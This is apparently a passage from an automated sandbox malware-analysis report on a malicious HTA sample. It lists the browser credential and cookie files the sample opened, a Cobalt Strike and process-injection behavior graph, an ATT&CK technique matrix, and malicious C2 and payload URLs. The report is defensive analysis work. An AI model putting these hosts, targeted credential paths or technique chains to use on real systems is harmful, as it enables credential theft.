                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1435a377-bbaf-4c9c-8706-0811a779fa3f
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\.metadata-v2
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\808127e8-e7ed-4078-b3f3-7f09061a011f
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\times.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.81ddb4cc-1d49-45f2-961f-e24ea6db2be5.health.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Telemetry.FailedProfileLocks.txt
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\12f997af-c065-4562-b9f6-11000bb95c9b
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834580.6fc53411-ad83-4cf6-a5f6-905f0f3f52e8.health.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1d5599c8-3f43-42cc-8163-9a43c60a06d1
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\78267ebf-1fb3-4b11-82e9-903e54a2a54e
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829746.67aa4432-87f8-463e-b422-f6679add9971.first-shutdown.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\6fc53411-ad83-4cf6-a5f6-905f0f3f52e8
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\7278f154-e8f4-4235-84c5-c5c1c6af0084
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\45e26519-596d-41a5-b290-e547b44111fd
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a5d6ec76-765c-4778-afd2-1e05a1554d8e
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\7d12ac42-15c3-4db9-abfe-259bc8d249ac
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\15f01145-7764-450b-9ad5-323693350a9c
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\previous.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857833.45e26519-596d-41a5-b290-e547b44111fd.health.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.a73949a2-5a70-4025-8008-88156c16bb4a.event.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\state.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a7174184-f177-48c4-876a-8a51c2ed8fbc
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829737.9f7a5e7a-2be0-4ff7-b132-b1f6e59a8e58.event.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834608.65054280-9d54-477d-a3ea-afcb1f88e001.health.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\events
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\session-state.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\05d02ac8-b2f1-4670-8541-db8ec2bbf427
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857869.95af30ae-acac-4802-b983-233d7fd3cf34.main.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txt
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\3a40aaf9-3f8b-43a2-85e8-88e3ffc7666f
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txt
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\parent.lock
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\277ffbb3-8e94-4f3f-acac-7a401d130160
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834606.011115ff-9301-40fc-805e-ba07b7fdfce4.event.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7944, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7728, type: MEMORYSTR
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                Valid Accounts11
                Native API
                111
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Exploitation for Client Execution
                1
                DLL Side-Loading
                623
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                2
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts11
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                1
                Credentials in Registry
                3
                File and Directory Discovery
                SMB/Windows Admin Shares11
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts3
                PowerShell
                Login HookLogin Hook1
                DLL Side-Loading
                NTDS128
                System Information Discovery
                Distributed Component Object Model11
                Input Capture
                114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Masquerading
                LSA Secrets531
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                Virtualization/Sandbox Evasion
                Cached Domain Credentials141
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items623
                Process Injection
                DCSync13
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Hidden Files and Directories
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585851 Sample: begoodforeverythinggreatthi... Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 75 prolinice.ga 2->75 77 res.cloudinary.com 2->77 83 Suricata IDS alerts for network traffic 2->83 85 Found malware configuration 2->85 87 Malicious sample detected (through community Yara rule) 2->87 89 15 other signatures 2->89 14 mshta.exe 1 2->14         started        17 icgfugf 2 2->17         started        19 icgfugf 2->19         started        signatures3 process4 signatures5 129 Suspicious command line found 14->129 131 PowerShell case anomaly found 14->131 21 cmd.exe 1 14->21         started        24 conhost.exe 17->24         started        26 conhost.exe 19->26         started        process6 signatures7 99 Detected Cobalt Strike Beacon 21->99 101 Suspicious powershell command line found 21->101 103 Wscript starts Powershell (via cmd or directly) 21->103 105 PowerShell case anomaly found 21->105 28 powershell.exe 42 21->28         started        33 conhost.exe 21->33         started        process8 dnsIp9 81 192.3.27.144, 49733, 49743, 80 AS-COLOCROSSINGUS United States 28->81 71 sweetnessgoodforgreatnessthingswith.vbS, Unicode 28->71 dropped 73 C:\Users\user\AppData\...\thj2bm0i.cmdline, Unicode 28->73 dropped 133 Loading BitLocker PowerShell Module 28->133 35 wscript.exe 2 28->35         started        38 csc.exe 3 28->38         started        file10 signatures11 process12 file13 91 Detected Cobalt Strike Beacon 35->91 93 Suspicious powershell command line found 35->93 95 Wscript starts Powershell (via cmd or directly) 35->95 97 2 other signatures 35->97 41 powershell.exe 15 16 35->41         started        69 C:\Users\user\AppData\Local\...\thj2bm0i.dll, PE32 38->69 dropped 44 cvtres.exe 1 38->44         started        signatures14 process15 signatures16 125 Writes to foreign memory regions 41->125 127 Injects a PE file into a foreign processes 41->127 46 aspnet_compiler.exe 41->46         started        49 conhost.exe 41->49         started        process17 signatures18 135 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 46->135 137 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 46->137 139 Maps a DLL or memory area into another process 46->139 141 3 other signatures 46->141 51 explorer.exe 25 4 46->51 injected process19 dnsIp20 79 prolinice.ga 46.173.214.14, 49744, 49746, 80 GARANT-PARK-INTERNETRU Russian Federation 51->79 67 C:\Users\user\AppData\Roaming\icgfugf, PE32 51->67 dropped 107 Benign windows process drops PE files 51->107 109 Injects code into the Windows Explorer (explorer.exe) 51->109 111 Writes to foreign memory regions 51->111 113 Hides that the sample has been downloaded from the Internet (zone.identifier) 51->113 56 explorer.exe 51->56         started        59 explorer.exe 51->59         started        61 explorer.exe 51->61         started        63 6 other processes 51->63 file21 signatures22 process23 signatures24 115 System process connects to network (likely due to code injection or exploit) 56->115 117 Found evasive API chain (may stop execution after checking mutex) 56->117 119 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 56->119 123 3 other signatures 56->123 121 Tries to harvest and steal browser information (history, passwords, etc) 59->121 65 WerFault.exe 63->65         started        process25

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                begoodforeverythinggreatthingsformebetterforgood.hta10%VirustotalBrowse
                begoodforeverythinggreatthingsformebetterforgood.hta5%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\icgfugf0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://prolinice.ga/0%Avira URL Cloudsafe
                http://192.3.27.144/250/sweetnes0%Avira URL Cloudsafe
                http://192.3.27.144/250/evenmegoodfor.txt0%Avira URL Cloudsafe
                http://prolinice.ga/2:i0%Avira URL Cloudsafe
                http://prolinice.ga/ndex.php0%Avira URL Cloudsafe
                http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFI0%Avira URL Cloudsafe
                http://prolinice.ga/j0%Avira URL Cloudsafe
                http://prolinice.ga/index.phpMozilla/5.00%Avira URL Cloudsafe
                http://prolinice.ga/ll0%Avira URL Cloudsafe
                http://prolinice.ga:80/index.phposoft0%Avira URL Cloudsafe
                http://prolinice.ga/index.phpH0%Avira URL Cloudsafe
                http://prolinice.ga/index.php100%Avira URL Cloudmalware
                http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
                http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIF0%Avira URL Cloudsafe
                http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFLMEM0%Avira URL Cloudsafe
                http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFuuC:0%Avira URL Cloudsafe
                http://vilendar.ga/index.php100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                prolinice.ga
                46.173.214.14
                truetrue
                  unknown
                  res.cloudinary.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    http://192.3.27.144/250/evenmegoodfor.txttrue
                    • Avira URL Cloud: safe
                    unknown
                    http://prolinice.ga/index.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://vilendar.ga/index.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFtrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://aka.ms/odirmrexplorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/chrome_newtabexplorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drfalse
                        high
                        http://prolinice.ga/ndex.phpexplorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/ac/?q=explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drfalse
                          high
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://192.3.27.144/250/sweetnespowershell.exe, 00000004.00000002.1762483774.0000000004F17000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://excel.office.comexplorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/koswald/VBScript/blob/master/SetupPerUser.mdwscript.exe, 00000007.00000003.1727917587.0000000005461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731232667.0000000003020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1734359512.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731003803.000000000592F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731407928.0000000005561000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood[1].tiff.4.dr, sweetnessgoodforgreatnessthingswith.vbS.4.drfalse
                                      high
